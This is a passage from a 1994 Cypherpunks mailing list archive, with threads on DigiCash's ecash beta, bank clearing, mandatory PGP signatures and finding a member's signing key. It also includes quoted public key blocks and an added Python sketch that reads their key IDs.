> respond to me, but today on the www-buyinfo list, Stefan Brands, who
> many think has the best ecash technology available today, posted that he
> had had the same experience! Brands himself has still not been given
> an opportunity to join the beta test. He did not sound very happy about
> this.

I was in the same boat-- I sent in several requests, all of which were
ignored. After Digicash issued a call for prototype shops, I signed
up. WHAM. I immediately started getting mail asking when I'd have my
shop ready-- sometimes two or three messages a day. Once I got
everything up and running, I didn't hear further from them.

Since then, an accident on my WWW server has rendered the e-shop
inoperable. I've asked Digicash, in the form of Paul Diniessen, for
help reconstructing the bank records. No go.

> Of course, it may well be a matter of incompetence rather than insult,
> but the net result is the same. The more I see of digicash's lack of
> consideration towards their potential customers and important figures like
> Brands the more I question whether they have the potential to succeed.

The more I deal with Digicash, the better First Virtual looks.
My technical preference is for using Brands or Chaum cash; at present,
though, there aren't any shipping Brands servers, and the Digicash
folks don't seem to be able to get all their socks in one bag.

Digicash's system doesn't scale entirely cleanly, but it's Good Enough
if there's one central bank which all other banks can use, just as the
credit card companies have a central clearinghouse which allows my
credit union Visa to be used with merchants whose accounts are at
Citibank.

The problems with Digicash thus far have been political and business
problems, not technical ones. As others have pointed out,
network bandwidth and processing CPU are cheap enough to allow
multiple banks to communicate cleanly. Real banks already understand
how to do this.

- -Paul

- --
Paul Robichaux, KD4JZG       | Good software engineering doesn't reduce the
perobich at ingr.com          | amount of work you put into a product; it just
Not speaking for Intergraph. | redistributes it differently.
### http://www.intergraph.com ###

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLt44Xafb4pLe9tolAQH4AgP/U93rIqM73vBYb/wByCjfBDENuYKTSRe4
C4sRzMt6mgFqs/RSeTczA4x8CZi/ytVw5zjN4ApWuWC9BZpnSrHjBxls/pwRwhGB
2OrViy5jVYtlJ+v78JemsZhiKqOBU2bZ0TDWYVmSKcvWN20fG3fri77lKrpMpYT1
feNB7+T+Q1w=
=SZ9T
-----END PGP SIGNATURE-----

From eric at remailer.net Thu Dec 1 13:01:26 1994
From: eric at remailer.net (Eric Hughes)
Date: Thu, 1 Dec 94 13:01:26 PST
Subject: Warm, fuzzy, misleading feelings
In-Reply-To: <199412012011.MAA09700@python>
Message-ID: <199412012200.OAA13845@largo.remailer.net>

   From: "Dr. D.C. Williams"

   I would prefer to teach fewer of them to speak than teach a larger
   number of them to grunt.

I would rather that the fewer speak and that the rest grunt rather
than remain silent.

   A bogus signature is, of course, unverifiable. Why waste effort
   requiring something as non-functional as a spoofed signature?

For the architectural changes that have to be made to do such a thing
automatically.

   Why?
   Even AOlers can make a bogus sig as a .sig file and attach it to
   every outgoing message.

But this doesn't create even a bogus signature. There's still a line
at the top to add. This misunderstanding about what constitutes valid
syntax colors your whole argument.

   Then the vast majority of grunters will put a spoof in their .sig
   files and be "done" with crypto.

.sig spoofing won't work; it's only the bottom half. That's the whole
point, is that some active action must be taken, be it once to set up
something automatic or many times with each message. In the first
case, the automaticity is obtained, a positive benefit of itself. In
the second, a value is recalled to mind each time.

   I'm disappointed that your original objective has been compromised
   by an "automatic-spoof-is-good-enough" clause.

It's not good enough, but it is partial progress. Merely because one
technique doesn't accomplish everything is no reason to abandon it.

Eric

From merriman at metronet.com Thu Dec 1 13:40:36 1994
From: merriman at metronet.com (David K. Merriman)
Date: Thu, 1 Dec 94 13:40:36 PST
Subject: Closed Account
Message-ID: <199412012141.AA06546@metronet.com>

Hmmmph. It looks like I'm not the only one getting these things.....

Dave Merriman

>
>ACCOUNT cfrye at mason1.gmu.edu IS NO LONGER AVAILABLE.
>IF THIS IS A LIST, THEN PLEASE REMOVE THIS ADDRESS.
>
>>From owner-cypherpunks at toad.com Thu Dec 1 15:58:04 1994
>Received: from toad.com by relay2.UU.NET with SMTP
> id QQxslf15044; Thu, 1 Dec 1994 15:56:42 -0500
>Received: by toad.com id AA03659; Thu, 1 Dec 94 12:55:37 PST
>Received: from ducie.cs.umass.edu by toad.com id AA03653; Thu, 1 Dec 94 12:55:31 PST
>Received: (from lmccarth at localhost) by ducie.cs.umass.edu (8.6.9/8.6.9)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
id PAA23759 for cypherpunks at toad.com; Thu, 1 Dec 1994 15:56:00 -0500
>From: "L. McCarthy"
>Message-Id: <199412012056.PAA23759 at ducie.cs.umass.edu>
>Subject: Is it happening already ?
>To: cypherpunks at toad.com (Cypherpunks Mailing List)
>Date: Thu, 1 Dec 1994 15:55:58 -0500 (EST)
>Reply-To: cypherpunks at toad.com (Cypherpunks Mailing List)
>X-Mailer: ELM [version 2.4 PL22]
>Mime-Version: 1.0
>Content-Type: text/plain; charset=US-ASCII
>Content-Transfer-Encoding: 7bit
>Content-Length: 1204
>Sender: owner-cypherpunks at toad.com
>Precedence: bulk

- - - - - - - - - - - - - - - - - - - - - - - - - -
Finger merriman at feenix.metronet.com for PGP public key and fingerprint.
PGP encrypted Email welcome, encouraged, and preferred.
"Those who make peaceful revolution impossible will make violent
revolution inevitable." John F. Kennedy

From mccoy at io.com Thu Dec 1 13:52:09 1994
From: mccoy at io.com (Jim McCoy)
Date: Thu, 1 Dec 94 13:52:09 PST
Subject: Brands excluded from digicash beta
In-Reply-To: <199412012056.AA05724@poboy.b17c.ingr.com>
Message-ID: <199412012151.PAA07927@pentagon.io.com>

paul at poboy.b17c.ingr.com (Paul Robichaux) writes:
[digicash stuff...]

At some point I am going to have to take a look at my NDA with Digicash
again and see how much I can say about the reality of some of these
things...

>
> As others have pointed out,
> network bandwidth and processing CPU are cheap enough to allow
> multiple banks to communicate cleanly. Real banks already understand
> how to do this.

Wanna bet? You should get into a clearing discussion with Eric sometime (I
think that the clearing issue must be one of his favorite things in the
world as he has so much to say about it :) Clearing is not only
non-trivial, it can be downright ugly. A small system is not incredibly
difficult to set up, but a nationwide or global system would be something
that would give scores of engineers and designers nightmares for years to
come. Things are easy when you talk about your $50 Visa purchase or check,
but when you start to deal with clearing big aggregate sums through banks
things get real nasty very quickly.
In the US we have the Fedwire system and other gifts of the Federal
Reserve to prop up a few of the weakest parts of the problem, but it is
still a house of cards waiting for the right puff of wind...

jim

From jrochkin at cs.oberlin.edu Thu Dec 1 13:56:06 1994
From: jrochkin at cs.oberlin.edu (Jonathan Rochkind)
Date: Thu, 1 Dec 94 13:56:06 PST
Subject: "Cyherpunks Named Official Signing Authority"
Message-ID:

At 3:05 PM 12/01/94, Eric Hughes wrote:
>WARNING: The following paragraph does not have direct relevance to the
>issue at hand. It discusses servers which might verify signatures,
>which my current proposal does not have in it.
>
>What I have realized in the interim is, that if a server is to verify
>a signature, the server should sign not the message but rather the
>signature. After all, the signature is what was being verified, not
>any property of the message. The user can still detect message
>alteration, by first verifying the sig-on-sig, and then comparing the
>hash value in the original sig to a hash on the message.

I echo Eric's warning, that I also don't mean this to have anything to do
with the current thread.

The benefit of having the list sign the entire message, is that even if
people _don't_ sign the message themselves (assuming they aren't being
required to ;) ), there's still something left to sign. The list would be
signing to indicate that, yes, this message did pass through cypherpunks
at toad.com. Regardless of whether the author signed the message himself
or not, completely different issue.

From paul at poboy.b17c.ingr.com Thu Dec 1 14:02:42 1994
From: paul at poboy.b17c.ingr.com (Paul Robichaux)
Date: Thu, 1 Dec 94 14:02:42 PST
Subject: Brands excluded from digicash beta
In-Reply-To: <199412012151.PAA07927@pentagon.io.com>
Message-ID: <199412012201.AA08104@poboy.b17c.ingr.com>

-----BEGIN PGP SIGNED MESSAGE-----

> paul at poboy.b17c.ingr.com (Paul Robichaux) writes:
> [digicash stuff...]
> At some point I am going to have to take a look at my NDA with Digicash
> again and see how much I can say about the reality of some of these
> things...

I've asked them to say something. The best I could get out of Paul
Dineissen is that they're talking with banks. Well, duh. The _present_
reality is that I can sell things ** and get paid ** if I use First
Virtual, but not if I use ecash.

> >
> > As others have pointed out,
> > network bandwidth and processing CPU are cheap enough to allow
> > multiple banks to communicate cleanly. Real banks already understand
> > how to do this.

> Wanna bet? You should get into a clearing discussion with Eric sometime (I
> think that the clearing issue must be one of his favorite things in the
> world as he has so much to say about it :) Clearing is not only
> non-trivial, it can be downright ugly. A small system is not incredibly
> difficult to set up, but a nationwide or global system would be something
> that would give scores of engineers and designers nightmares for years to
> come. Things are easy when you talk about your $50 Visa purchase or check,
> but when you start to deal with clearing big aggregate sums through banks
> things get real nasty very quickly.

Why clear big aggregate sums? Why not just clear smaller ones? Hell,
why not use a forwarding engine that just says "this cash came from
bank X" and sends it along?

I'm sure that the design of a robust, usable system is nontrivial, and
I don't mean to imply that it is. I just don't believe that a tool the
size of Fedwire and the existing bank architectures are, or will be,
required.

- -Paul

- --
Paul Robichaux, KD4JZG       | Good software engineering doesn't reduce the
perobich at ingr.com          | amount of work you put into a product; it just
Not speaking for Intergraph. | redistributes it differently.
### http://www.intergraph.com ###

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLt5Hxqfb4pLe9tolAQGA0gQAgd8BcSVu199NjEx3uMq4/ZrtaRA34z/g
X/VOMOIfUOuftj2wIiF5iVM5CMOoxMUz4J3gPESIOjZnVEtDUsfsD5aCtTuJW+39
Dmmjkm1nlTynDag7A0tsW39AfqGCpWy4gqcgwhHrvUvKt2Tts/XkvFwkT/wjLM0f
3reNbfPMSZY=
=y4mZ
-----END PGP SIGNATURE-----

From jrochkin at cs.oberlin.edu Thu Dec 1 14:04:57 1994
From: jrochkin at cs.oberlin.edu (Jonathan Rochkind)
Date: Thu, 1 Dec 94 14:04:57 PST
Subject: FYI: Eudora and PGP
Message-ID:

I have heard from the (one of the?) author(s) of Mac Eudora, on another
list, that full support for ViaCrypt PGP will be added to the commercial
version of Eudora in the spring. And probably PEM support too. It's
unclear to me when (if ever :( ) this will be added to the free version
of Eudora, or if 2.6ui (the only free (although semi-legal) version of Eudora
to support applescript) will be supported too. I still haven't figured out
if ViaCrypt MacPGP uses the same applescript suite as MacPGP 2.6ui, which
is the necessary detail there.

I found that exciting, and thought others might be interested in hearing it.
Or at least consider this post a welcome reprieve from the Mandatory
Signature Wars.

From dcwill at python.ee.unr.edu Thu Dec 1 14:15:48 1994
From: dcwill at python.ee.unr.edu (Dr. D.C. Williams)
Date: Thu, 1 Dec 94 14:15:48 PST
Subject: Warm, fuzzy, misleading feelings
In-Reply-To: <199412012200.OAA13845@largo.remailer.net>
Message-ID: <199412012214.OAA10060@python>

>
> From: "Dr. D.C. Williams"
>
> I would prefer to teach fewer of them to speak than teach a larger number
> of them to grunt.
>
> From Eric Hughes:
>
> I would rather that the fewer speak and that the rest grunt rather
> than remain silent.

It is far better that the silent become speakers rather than grunters.
Grunters, and sig spoofers, add nothing to the cause they steadfastly
refuse to participate in or join. It would be better for them to remain
silent than erode the language of the speakers.
Your proposal doesn't reward speaking. It merely allows grunting. Most
parents know from first hand experience that very young children learn
how to make complete sentences when their parents no longer accept
pointing and grunting as acceptable behavior.

> Why? Even AOlers can make a bogus sig as a .sig file and attach it to
> every outgoing message.
>
> But this doesn't create even a bogus signature. There's still a line
> at the top to add. This misunderstanding about what constitutes valid
> syntax colors your whole argument.

Excuse me. Let's say that the smarter ones also learn how to add

---------------------BEGIN SILLY EXERCISE------------------------

at the top. Not a Herculean effort for most, and still a lot easier than
even retrieving PGP from the MIT site, to say nothing of learning how to
use it at the most basic level.

> I'm disappointed that your original objective has been compromised
> by an "automatic-spoof-is-good-enough" clause.
>
> It's not good enough, but it is partial progress. Merely because one
> technique doesn't accomplish everything is no reason to abandon it.

If it diverts the course of progress away from the desired objective, it
deserves to be abandoned. If my goal is increasing my endurance to be
able to swim across the lake, I'm not willing to say that making it half
way across before developing cramps and drowning is any manner of
"partial progress".

My whole point is that the cause is noble and worthwhile, but this method
of achieving it is flawed, ineffective, and will do more harm than good
to the widespread of crypto. If you decide to require digital signatures,
it would be far better to require real sigs than bogus sigs. I would urge
you to set your sights higher than the goal you've defined so as to allow
for the inevitable circumvention that accompanies any new set of
requirements.
There are plenty of examples of "lowest common denominators" in society
today, and I think most people deserve (and prefer) something more than
that.

=D.C. Williams

From mccoy at io.com Thu Dec 1 14:16:05 1994
From: mccoy at io.com (Jim McCoy)
Date: Thu, 1 Dec 94 14:16:05 PST
Subject: Brands excluded from digicash beta
In-Reply-To: <199412012201.AA08104@poboy.b17c.ingr.com>
Message-ID: <199412012215.QAA11431@pentagon.io.com>

Paul Robichaux (perobich at ingr.com) writes:
> > Things are easy when you talk about your $50 Visa purchase or check,
> > but when you start to deal with clearing big aggregate sums through banks
> > things get real nasty very quickly.
>
> Why clear big aggregate sums? Why not just clear smaller ones? Hell,
> why not use a forwarding engine that just says "this cash came from
> bank X" and sends it along?

I will defer to Eric on this one, but what happens if bank X does not seem
to respond? What happens if bank X goes bankrupt between the time it says
"Yes that coin is good, pay user foo", and the time your bank goes to get
the money from bank X to settle its payment to user foo? Are you going to
clear every transaction individually, if so how much more will that cost
you than batching transactions? What factors become involved when banks
start borrowing money to clear daily transactions among themselves?

Take a look at the process involved in clearing checks and you will soon
see how it can get very strange.

jim

From jamiel at sybase.com Thu Dec 1 14:18:24 1994
From: jamiel at sybase.com (Jamie Lawrence)
Date: Thu, 1 Dec 94 14:18:24 PST
Subject: FYI: Eudora and PGP
Message-ID:

>I have heard from the (one of the?) author(s) of Mac Eudora, on another

Just Steve Dorner. Eudora is his baby.

>to support applescript) will be supported too. I still haven't figured out
>if ViaCrypt MacPGP uses the same applescript suite as MacPGP 2.6ui, which
>is the necessary detail there.
Currently, it does (according to a Viacrypt employee and one other
person on this list).

>Or at least consider this post a welcome reprieve from the Mandatory
>Signature Wars.

Intentionally posting off topic, eh Jonathan? :)

-j

From geoffrey at crl.com Thu Dec 1 14:22:07 1994
From: geoffrey at crl.com (Geoffrey Faivre-Malloy)
Date: Thu, 1 Dec 94 14:22:07 PST
Subject: Where to get PGP for SunOS
Message-ID:

One last question answered and i'll be off and running :) Where can i
get PGP for SunOS?

Thanks,
Geoffrey

--------------------------------------------------------------------------
| Geoffrey at crl.com          The opinions expressed herein may or       |
| Geoffrey Faivre-Malloy      may not be the opinions of my employer.    |
| Purple Duck Software        Like anyone really cares...                |
--------------------------------------------------------------------------
| Snail Mail: 613 Calibre Springs Way, Atlanta GA, 30342                 |
--------------------------------------------------------------------------

From KDAGUIO at aba.com Thu Dec 1 14:30:38 1994
From: KDAGUIO at aba.com (KDAGUIO at aba.com)
Date: Thu, 1 Dec 94 14:30:38 PST
Subject: E-money Good or Bad?
Message-ID:

It has been my belief that there isn't an effective way for me to use
PGP, but with all the hubbub, I thought it might be worthwhile to verify
this.

My internet access is through a personal account provided by my
employer. It is on a machine used exclusively by employees of the
University of Illinois (no student accounts). My primary access to this
account is through my IBM xt (dos 3.3) at work. This machine is
occasionally used by others and is outside of my control. I also use
many of the public access Win/Mac machines on campus. I have no pc of my
very own.

Is there an effective way for me to use PGP?

-- Matt Hewn --
Information is not knowledge; knowledge is not wisdom; wisdom is not
truth. Truth is absolute.

From lmccarth at ducie.cs.umass.edu Thu Dec 1 14:38:31 1994
From: lmccarth at ducie.cs.umass.edu (L.
McCarthy) Date: Thu, 1 Dec 94 14:38:31 PST Subject: Is it happening already ? In-Reply-To: <199412012056.PAA23759@ducie.cs.umass.edu> Message-ID: <199412012238.RAA23999@ducie.cs.umass.edu> -----BEGIN PGP SIGNED MESSAGE----- I wrote: > Does someone else have Hal's key ? So far some kind people have sent me two key blocks: The first was - -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.2 mQCNAiqsNkwAAAEEAMKWM52m5EWi0ocK4u1cC2PPyHT6tavk9PC3TB5XBYDegf3d sldRpnjJj1r+aO08FFO+QLEI9wtBqvf1PPP5iLX7sD2uIVlJH14MPtyVtjm9ZKb8 JMtCW74045BgtHBC9yQ3V7vXNV5jM6dE2ocnH4AI/pBFrGLJPKgTA69YIUw3AAUR tCZIYWwgRmlubmV5IDw3NDA3Ni4xMDQxQGNvbXB1c2VydmUuY29tPg== =4Yeq - -----END PGP PUBLIC KEY BLOCK----- which is for a Compuserve account Hal apparently has. This wasn't used to sign the recent messages. The second was - -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.2 mQCNAiqsNkwAAAEEAMKWM52m5EWi0ocK4u1cC2PPyHT6tavk9PC3TB5XBYDegf3d sldRpnjJj1r+aO08FFO+QLEI9wtBqvf1PPP5iLX7sD2uIVlJH14MPtyVtjm9ZKb8 JMtCW74045BgtHBC9yQ3V7vXNV5jM6dE2ocnH4AI/pBFrGLJPKgTA69YIUw3AAUR tCZIYWwgRmlubmV5IDw3NDA3Ni4xMDQxQGNvbXB1c2VydmUuY29tPg== =4Yeq - -----END PGP PUBLIC KEY BLOCK----- which didn't contain any keys I didn't already have. I'm still seeking the key used to sign the recent messages from Hal. I should have mentioned before that it should have Key ID 4ECBD301. When I find it I'll send it to the list. - -L. Futplex McCarthy; PGP key by finger or server "Don't say my head was empty, when I had things to hide...." 
--Men at Work -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBLt5QXmf7YYibNzjpAQHnUwP/efaYMxT1cEBtxMPq6n3oG6i9YeKx/pv1 2P4tshd29QhddpYjAUxwwq/iEgGs92t1H4VUx6qWAy+zXm88XWd6S+WmJFbDDgci dS5pgKbfe4XnKKEbroPyVRV9I4VQwcwGDE+RXE0n8MsJ5hr8ZEauRLVHaSukOH5Q kTinxPVNL0I= =/RFx -----END PGP SIGNATURE----- From jamiel at sybase.com Thu Dec 1 14:39:51 1994 From: jamiel at sybase.com (Jamie Lawrence) Date: Thu, 1 Dec 94 14:39:51 PST Subject: Brands excluded from digicash beta Message-ID: >Paul Robichaux (perobich at ingr.com) writes: >Take a look at the process involved in clearing checks and you will soon >see how it can get very strange. If clearing sounds simple, may I suggest as a general rule of thumb to look at the complexities involved with transaction management in distributed database environment, and multiply the complexity found there by the number of banks worldwide. Then, find a way to factor in a many-to-many instead of a one-to-few achitecture. And that rule of thumb completely ignores the fact that if a transaction is fouled up anywhere along the line, one finds extensive legal liability involved instead of a 'mere' corrupt table in a database. -j >jim From jamiel at sybase.com Thu Dec 1 14:42:31 1994 From: jamiel at sybase.com (Jamie Lawrence) Date: Thu, 1 Dec 94 14:42:31 PST Subject: E-money Good or Bad? Message-ID: >The following is not flamebait!!! Heh... Nice try. -j From hfinney at shell.portal.com Thu Dec 1 14:51:07 1994 From: hfinney at shell.portal.com (Hal) Date: Thu, 1 Dec 94 14:51:07 PST Subject: Is it happening already ? Message-ID: <199412012250.OAA10476@jobe.shell.portal.com> Here is my key. I just sent it to the keyservers. I hadn't had a chance to sign it with my secure key yet. 
Hal -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6 mQBNAy7bVn8AAAECAPRhqHLha5WFaFQw0/b1Wn8XCuHokjvbEeJbg5UPHs6fBE3i uZTmAY5aFqnFXOdNGackOOTYu3tEGcwsm07L0wEABRG0F0hhbCBGaW5uZXkgaW5z ZWN1cmUga2V5iQCVAwUQLt5K9agTA69YIUw3AQED0gQAoORH1weDQ+L2gefrRauI GLqDlNy0nJQDo5wgdJky5Pd7vUJalwxGuqnQG1QV+ejnRYEN7wEoYQRjv21tTos9 nbUtWAoINrEVjWHpG7AXIRNyoCJtket9mQ2jz9QNTD9Nt8JsedJlqLuT7RMLN1tb /cIYnrBCyuTCek4fRbTYkSU= =G3nF -----END PGP PUBLIC KEY BLOCK----- From ianf at sydney.sgi.com Thu Dec 1 14:53:53 1994 From: ianf at sydney.sgi.com (Ian Farquhar) Date: Thu, 1 Dec 94 14:53:53 PST Subject: More on ASIS... Message-ID: <9412020943.ZM11558@wiley.sydney.sgi.com> I was told this morning that the ASIS post had been reposted to several other lists, including several social ones. Interesting... Anyway, there was a followup to the incident on the radio this morning (2BL, is anyone was listenning): Gareth Evans (Minister for Foreign Affairs) has announced that no documents were irretrievably lost in the fire, as everything which was lost in the fire was also duplicated elsewhere. In addition to this, the fire is being referred to the ACT coroner's office, as despite the original claim by the Federal Government that there were no suspicious circumstances, the Australian Federal Police have decided to do pursue this action. It is not clear yet whether this is a matter of proceedure, or whether suspicious circumstances are suspected. The government's original claim was produced with surprisingly little time for investigation, it has been noted. Ian. 
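
[Added example, not part of any list message and not code from PGP or the
posters: the "Is it happening already ?" thread above turns on whether a
received key block really holds the key with Key ID 4ECBD301. This Python
sketch reads the PGP 2.x public-key packet from the two armored blocks
quoted in that thread and derives each key ID from the low bits of the RSA
modulus. Function and constant names are hypothetical; the armor checksum
is not verified.]

```python
import base64

# Armored blocks copied from the list messages above (dash-escaping removed).
COMPUSERVE_BLOCK = """\
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAiqsNkwAAAEEAMKWM52m5EWi0ocK4u1cC2PPyHT6tavk9PC3TB5XBYDegf3d
sldRpnjJj1r+aO08FFO+QLEI9wtBqvf1PPP5iLX7sD2uIVlJH14MPtyVtjm9ZKb8
JMtCW74045BgtHBC9yQ3V7vXNV5jM6dE2ocnH4AI/pBFrGLJPKgTA69YIUw3AAUR
tCZIYWwgRmlubmV5IDw3NDA3Ni4xMDQxQGNvbXB1c2VydmUuY29tPg==
=4Yeq
-----END PGP PUBLIC KEY BLOCK-----
"""

HAL_LIST_BLOCK = """\
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6

mQBNAy7bVn8AAAECAPRhqHLha5WFaFQw0/b1Wn8XCuHokjvbEeJbg5UPHs6fBE3i
uZTmAY5aFqnFXOdNGackOOTYu3tEGcwsm07L0wEABRG0F0hhbCBGaW5uZXkgaW5z
ZWN1cmUga2V5iQCVAwUQLt5K9agTA69YIUw3AQED0gQAoORH1weDQ+L2gefrRauI
GLqDlNy0nJQDo5wgdJky5Pd7vUJalwxGuqnQG1QV+ejnRYEN7wEoYQRjv21tTos9
nbUtWAoINrEVjWHpG7AXIRNyoCJtket9mQ2jz9QNTD9Nt8JsedJlqLuT7RMLN1tb
/cIYnrBCyuTCek4fRbTYkSU=
=G3nF
-----END PGP PUBLIC KEY BLOCK-----
"""


def dearmor(block):
    """Return the binary packets inside an ASCII-armored PGP block."""
    body, in_body = [], False
    for line in block.strip().splitlines():
        line = line.strip()
        if line.startswith("-----BEGIN PGP"):
            continue
        if line.startswith("-----END PGP"):
            break
        if not in_body:
            # Armor headers ("Version: ...") end at the first blank line.
            in_body = (line == "")
            continue
        if line.startswith("="):  # CRC-24 line; not checked in this sketch
            break
        body.append(line)
    return base64.b64decode("".join(body))


def packets(data):
    """Yield (tag, body) for old-format packets, the kind PGP 2.x writes."""
    i = 0
    while i < len(data):
        ctb = data[i]
        if ctb & 0xC0 != 0x80:
            raise ValueError("not an old-format packet header")
        tag, len_type = (ctb >> 2) & 0x0F, ctb & 0x03
        if len_type == 3:
            raise ValueError("indeterminate-length packet not supported")
        n = 1 << len_type  # 1, 2 or 4 length bytes
        start = i + 1 + n
        length = int.from_bytes(data[i + 1:start], "big")
        if start + length > len(data):
            raise ValueError("truncated packet")
        yield tag, data[start:start + length]
        i = start + length


def read_mpi(buf, off):
    """Read one multiprecision integer: 2-byte bit count, then the value."""
    bits = int.from_bytes(buf[off:off + 2], "big")
    nbytes = (bits + 7) // 8
    value = int.from_bytes(buf[off + 2:off + 2 + nbytes], "big")
    return value, bits, off + 2 + nbytes


def key_summary(block):
    """List the RSA public keys in a block with their IDs and user IDs."""
    keys, current = [], None
    for tag, body in packets(dearmor(block)):
        if tag == 6:  # public-key packet
            # Layout: version(1) timestamp(4) validity(2) algorithm(1) n e
            if body[0] not in (2, 3) or body[7] != 1:
                raise ValueError("expected a version 2/3 RSA key")
            n, bits, off = read_mpi(body, 8)
            read_mpi(body, off)  # public exponent, parsed but unused
            current = {"bits": bits,
                       "key_id": "%016X" % (n & (2 ** 64 - 1)),
                       "short_id": "%08X" % (n & 0xFFFFFFFF),
                       "user_ids": []}
            keys.append(current)
        elif tag == 13 and current is not None:  # user ID packet
            current["user_ids"].append(body.decode("latin-1"))
    return keys


def holds_key(block, short_id):
    """True if the block contains a key whose 32-bit key ID matches."""
    return any(k["short_id"] == short_id.upper() for k in key_summary(block))


if __name__ == "__main__":
    for name, blk in (("first block", COMPUSERVE_BLOCK),
                      ("Hal's posted block", HAL_LIST_BLOCK)):
        for k in key_summary(blk):
            print(name, k["bits"], "bits, key ID", k["short_id"])
```

A matching key ID only locates a candidate key; checking the signature
against that key is what ties a message to it.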
From die at pig.die.com Thu Dec 1 15:03:36 1994
From: die at pig.die.com (Dave Emery)
Date: Thu, 1 Dec 94 15:03:36 PST
Subject: recent voice over data
In-Reply-To: <199412012150.NAA13820@largo.remailer.net>
Message-ID: <9412012302.AA02541@pig.die.com>

>
>
>    the great voice-over-data protocols and products introduced by
>    Intel, Rockwell, ZyXEL and others at Comdex which will make
>    Voice-PGP so much easier
>
> As I understand these voice-over-data products, the voice goes over
> analog, added to the modem signal. The modem signal is interpreted,
> and then reconstructed and subtracted from the incoming signal,
> leaving voice. Very clever, but insufficient for secure phones.
>

I can't quite see how this would work unless the voice was run at a very
low level relative to the data. In order to subtract the modulated
version data coming from the other end you have to know exactly what it
is, and in order to do that you need sufficient signal to noise of data
over everything else to reliably demodulate it or you need some means of
reliably predicting it.

Now I recognize that some of the time there is little or no entropy in
the information in one direction (it is completely predictable - such as
flags during LAPM idle intervals) and it is possible that one could
construct a syllabic gizmo that would turn off the entropy in the data
when talkspurts happened by doing flow control and stopping information
transmission during periods that speech was loud. But all of this seems a
bit much, and certainly would be subject to lots of kinds of degradation
depending on the speech content and any nonlinearity in the channel.

In general the modulations used in modems require at least 12-15 db of
SNR for decent BERs - this would imply that if the line was not
timeshared with voice in talkspurts that the peak level of the voice
would have to be about 20 db below the modem tones. I guess that this
would still result in intelligible speech even though it would
effectively be transmitted by only a couple of bits per 8 khz sample.

And yes I guess that by using forward error correction on the data at a
variable coding rate one could allow the voice to creep up on the data a
bit more by using a heavier duty error correction during talk spurts.

I had assumed that these products digitized voice and multiplexed it with
the data stream however. Certainly there are technologies to do this
including variable rate vocoding (ala Qualcomm) that would allow almost
the full bandwidth of the line to be used for data.

[ And yes I'll bring up premail tomorrow so I can sign things if I can
get around to it without interrupting serious work work - but I'm left
wondering who in the hell would want to forge posts from me ? ]

Dave Emery N1PRE

From adam at bwh.harvard.edu Thu Dec 1 15:11:08 1994
From: adam at bwh.harvard.edu (Adam Shostack)
Date: Thu, 1 Dec 94 15:11:08 PST
Subject: FYI: Eudora and PGP
In-Reply-To:
Message-ID: <199412012310.SAA05631@bwface.bwh.harvard.edu>

All of MacPGP 2.3v1.1, MacPGP2.6ui, and Viacrypt PGP 2.7 can be driven
via the use of AppleEvents, by the macpgp kit. This leads one to believe
that all three use the same suite of events. My scripting environment is
broken, so I can't actually test to see that the entire suite is the
same.

The macpgp kit can be found at duke.bwh.harvard.edu:/pub/adam/mcip

| to support applescript) will be supported too. I still haven't figured out
| if ViaCrypt MacPGP uses the same applescript suite as MacPGP 2.6ui, which
| is the necessary detail there.

Adam

--
"It is seldom that liberty of any kind is lost all at once."
                                                        -Hume

From shamrock at netcom.com Thu Dec 1 15:28:33 1994
From: shamrock at netcom.com (Lucky Green)
Date: Thu, 1 Dec 94 15:28:33 PST
Subject: Why nothing works [Was: Mandatory sig workaround]
Message-ID: <199412012323.PAA12571@netcom13.netcom.com>

-----BEGIN PGP SIGNED MESSAGE-----

Roy wrote in response to Tim:

>Tim, just for fun, what tools would need to appear to make it possible
>for you to sign your traffic? Maybe a description will inspire some of
>the Macheads out there to get hacking. (the astute reader will note
>that I'm not suggesting new tools to the erstwhile Mr. May, as has been
>done so often in the past)

There is no hacking in the world that could create the kind of tool that
would be needed to satisfy Tim. What would be required to satisfy Tim
can't be done and I think that most long time CP's are well aware of
that. We have had this discussion over and over for many issues (PGP,
MIME,..) for the last two years. The problem isn't that there are no
tools for Tim's Mac, the problem is that there is _no way_ to do all
these things on Netcom's UNIX host.

1. Tim: "I can't do any of the new things you are proposing because I
   don't have the tools."
2. Some CP: "Just download your mail to your local machine and process it
   there. There are many great ways to automate this on a Mac."
3. Tim: "I don't want to have to download mail for processing. I want to
   be able to do it all on Netcom's machine."
4. Some CP: "Just run PGP on Netcom's machine and process the mail
   there."
5. Tim: "Using PGP on a shared machine is a security risk."
6. Some CP: "Just use a low security key on Netcom to sign your
   messages."
7. Tim: "PGP on a timeshare is worse than nothing. It gives a wrong sense
   of security."
8. Some CP: "Since you don't want to do it on the host and you don't want
   to do it on another machine, there is no way for you to do it."
9. GOTO 1.

No, the above is not a quote of an actual exchange, but rather an
abbreviated version of what I gathered from reading hundreds of messages
and dozens of threads.

YMMV,

- --Lucky

-----BEGIN PGP SIGNATURE-----
Version: 2.6ui

iQCVAgUBLt41vASQkem38rwFAQFNRwP8DjwJ37unGf27LscvTOCU699wvXvH/pEI
kBdvRCHJNQbcerBc7SDwjgVJC3XaaIDlO1rqBfcZXZETOa/3EKnjFHiX0+6Kb0zo
b1k2lTmzFG7su2biwkmYkI5TlYEM4/nTpq/vYjZ3Md5rjXm5wA+cJcfivJd8RdX6
fRwWq2QXerM=
=z9wu
-----END PGP SIGNATURE-----

From raph at netcom.com Thu Dec 1 15:40:23 1994
From: raph at netcom.com (Raph Levien)
Date: Thu, 1 Dec 94 15:40:23 PST
Subject: Brands excluded from digicash beta
In-Reply-To: <199412011627.IAA14481@jobe.shell.portal.com>
Message-ID: <199412012339.PAA10951@netcom17.netcom.com>

I also have had no luck getting a beta client from digicash. I
"registered" through their WWW forms page, and got no response for about
a month. Then they sent me mail saying that they would be sending a
client, but that they were unrolling it in stages. That was about a month
ago. Perhaps this means I will get my client soon.

This does not speak well for digicash. If they were not ready to beta
their stuff, they should not have announced it. As it is, it makes them
look like a flake.

BTW, I am beginning to amass NexusBucks. I would _really_ like to buy
